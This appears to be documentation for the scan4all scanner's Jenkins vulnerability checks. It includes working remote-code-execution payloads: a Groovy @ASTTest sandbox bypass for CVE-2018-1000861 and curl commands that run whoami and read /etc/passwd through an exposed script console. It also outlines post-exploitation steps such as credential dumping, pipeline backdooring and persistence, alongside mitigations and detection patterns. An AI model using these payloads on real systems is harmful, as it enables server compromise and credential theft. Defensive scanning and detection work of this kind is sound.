Skip to main content

Overview

Jenkins is a popular open-source automation server used for CI/CD pipelines. scan4all includes POCs for multiple Jenkins vulnerabilities that allow remote code execution and unauthorized access.
Jenkins servers often have access to production environments, source code repositories, and credentials. Compromise can lead to supply chain attacks.

Supported Vulnerabilities

CVE-2016-0792

CVE-2016-0792

TypeJenkins Vulnerability
Affected VersionsVarious
Discovery Date2016
Description: Jenkins vulnerability affecting various versions. The POC checks for specific Jenkins configuration weaknesses. Source: pocs_go/jenkins/CVE_2016_0792.go

CVE-2018-1000110

TypeUser Enumeration
Affected VersionsVarious Jenkins versions
Discovery DateFebruary 2018
CVSS Score5.3 (Medium)
Description: Jenkins user search functionality can be exploited to enumerate valid usernames on the system. This information can be used for targeted attacks, password spraying, or social engineering. Impact:
  • Username enumeration
  • Information disclosure
  • Reconnaissance for further attacks
Detection Method: 
# Check user search endpoint
curl http://jenkins/asynchPeople/
curl http://jenkins/securityRealm/user/
Source: pocs_go/jenkins/CVE_2018_1000110.go

CVE-2018-1000861 - Groovy Script RCE

CVE-2018-1000861

TypeRemote Code Execution
Affected Versions2.153 and earlier, LTS 2.138.3 and earlier
Discovery DateDecember 2018
CVSS Score8.8 (High)
Description: Critical vulnerability in Jenkins that allows authenticated users with Overall/Read permission to execute arbitrary Groovy scripts. The vulnerability exists in the Script Security sandbox bypass. Technical Details:
  • Requirement: Authenticated user with read access
  • Component: Script Security Plugin
  • Attack Vector: Groovy AST (Abstract Syntax Tree) transformation
  • Impact: Complete server compromise
Exploitation Method:
1

Check for Jenkins Session

Verify the X-Jenkins-Session header is present
2

Send AST Test Payload

POST Groovy script with @ASTTest annotation
3

Execute Command

Use Runtime.exec() within AST transformation
4

Verify Execution

Check for “No such file or directory” error (indicates execution attempt)
POC Payloads: 
import groovy.transform.*
@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("vtest")})
class Person{}
Detection Request: 
# Check vulnerability
curl -X POST "http://jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7bassert+java.lang.Runtime.getRuntime().exec(%22vtest%22)%7d)%0aclass+Person%7b%7d"
Indicators of Vulnerability:
  • HTTP 500 response
  • Error message: “No such file or directory”
  • Stack trace mentioning @ASTTest
Source: pocs_go/jenkins/CVE_2018_1000861.go

CVE-2019-1003000 - Groovy Script Security RCE

CVE-2019-1003000

TypeRemote Code Execution
Affected VersionsGroovy ≤ 2.61, Script Security ≤ 1.49
Discovery DateJanuary 2019
CVSS Score8.8 (High)
Description: Another script security sandbox bypass in Jenkins. This vulnerability affects the Script Security plugin and Groovy plugin, allowing authenticated users to execute arbitrary code. Technical Details:
  • Component: Script Security Plugin ≤ 1.49
  • Component: Groovy Plugin ≤ 2.61
  • Attack Vector: Sandbox escape via meta-programming
  • Requirement: Authenticated user
Vulnerable Components:
ComponentVulnerable Version
Script Security Plugin≤ 1.49
Groovy Plugin≤ 2.61
Exploitation: Similar to CVE-2018-1000861, but uses different sandbox escape techniques:
  • Meta-class manipulation
  • Method pointer abuse
  • Closure manipulation
Mitigation:
1

Update Script Security

Update Script Security Plugin to 1.50 or later
2

Update Groovy Plugin

Update Groovy Plugin to 2.62 or later
3

Review Scripts

Audit all Groovy scripts for malicious code
4

Restrict Permissions

Limit who can create and modify scripts
Source: pocs_go/jenkins/CVE_2019_1003000.go

Unauthorized Groovy Script Execution

Unauthorized Groovy RCE

TypeUnauthorized Remote Code Execution
Affected VersionsVarious (misconfigured)
IssueMissing authentication on script console
Description: Some Jenkins installations have improperly configured security settings that allow unauthenticated access to the Groovy script console. This provides direct remote code execution without any credentials. Common Misconfigurations:
  1. No Authorization Strategy 
    Jenkins > Manage Jenkins > Configure Global Security
Authorization: "Anyone can do anything"
  2. Public Script Console 
    /script endpoint accessible without authentication
/scriptText endpoint exposed
  3. Anonymous Read+Execute
    • Anonymous user has execute permissions
    • Matrix-based security misconfigured
Detection: 
# Check if script console is accessible
curl http://jenkins/script
curl http://jenkins/scriptText

# Check if job creation is allowed
curl http://jenkins/createItem

# Try to access manage page
curl http://jenkins/manage
Exploitation: 
# Execute Groovy script
curl -X POST http://jenkins/scriptText \
  -d "script=println('whoami'.execute().text)"

# Alternative endpoint
curl -X POST http://jenkins/script \
  -d "script=println('id'.execute().text)" \
  -d "Submit=Run"
Common Groovy Payloads: 
println "whoami".execute().text
println "cat /etc/passwd".execute().text
Source: pocs_go/jenkins/Unauthorized.go

Usage

Scanning Jenkins Servers

# Scan a Jenkins server
scan4all -h http://jenkins.example.com

# Scan with explicit POC testing
scan4all -h http://jenkins.example.com:8080 -poc

# Test specific Jenkins CVE
scan4all -h http://jenkins.example.com -poc CVE-2018-1000861

Common Jenkins Ports

  • 8080 - Default HTTP port
  • 8443 - Default HTTPS port
  • 50000 - Default JNLP agent port

Identifying Jenkins

HTTP Headers: 
X-Jenkins: 2.x.x
X-Jenkins-Session: xxxxxxxx
X-Hudson: 1.395
Common Endpoints: 
/jenkins/
/ci/
/script
/login
/view/All/builds
/api/json
Response Body: 
<title>Dashboard [Jenkins]</title>
<meta name="ROBOTS" content="INDEX,NOFOLLOW">

Mitigation

General Jenkins Security

1

Enable Authentication

Configure Jenkins Security with proper authentication (LDAP, SSO, etc.)
2

Configure Authorization

Use Matrix-based or Project-based authorization strategy
3

Update Jenkins

Keep Jenkins core and all plugins up to date
4

Secure Script Console

Restrict script console access to administrators only
5

Network Isolation

Place Jenkins behind VPN or restrict IP access
6

Monitor Activity

Enable and review audit logs regularly

Secure Configuration Example

Disable Anonymous Access
import jenkins.model.Jenkins
import hudson.security.*

def instance = Jenkins.getInstance()

// Enable security
instance.setSecurityRealm(new HudsonPrivateSecurityRealm(false))

// Set authorization strategy
instance.setAuthorizationStrategy(new FullControlOnceLoggedInAuthorizationStrategy())

instance.save()

Plugin Security

PluginMinimum Safe VersionVulnerability
Script Security1.50+CVE-2019-1003000
Groovy2.62+CVE-2019-1003000
Jenkins Core2.154+, LTS 2.138.4+CVE-2018-1000861

Detection Indicators

Network Indicators

Vulnerable Endpoints: 
/script
/scriptText
/securityRealm/user/admin/descriptorByName/
/asynchPeople/
Suspicious Requests:
  • POST to /script or /scriptText
  • Groovy code in request bodies
  • @ASTTest in parameters
  • execute(), Runtime.exec() in payloads

Log Patterns

GroovyScript.evaluate
SecureGroovyScript
@ASTTest
java.lang.Runtime.exec
ProcessBuilder

Source Code Location

pocs_go/jenkins/
├── CVE_2016_0792.go
├── CVE_2016_0792_test.go
├── CVE_2018_1000110.go
├── CVE_2018_1000861.go
├── CVE_2019_1003000.go
└── Unauthorized.go

Real-World Impact

Jenkins servers commonly have:
  • Access to production servers via SSH keys
  • Cloud provider credentials (AWS, Azure, GCP)
  • Source code repository credentials
  • Database connection strings
  • API keys and secrets
  • Certificate private keys
Compromise of Jenkins can lead to complete infrastructure takeover.

Post-Exploitation

Once Jenkins is compromised, attackers typically:
  1. Extract Credentials 
    // Dump all stored credentials
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(...)
  2. Modify Build Pipelines
    • Inject malicious code into builds
    • Create supply chain attacks
    • Backdoor deployed applications
  3. Lateral Movement
    • Use stored SSH keys
    • Access connected systems
    • Pivot to internal network
  4. Persistence
    • Create new admin users
    • Modify startup scripts
    • Install malicious plugins

References

Jenkins security requires ongoing attention. Regularly review security settings, update plugins, and audit user permissions.

Build docs developers (and LLMs) love

Get started for freeTalk to us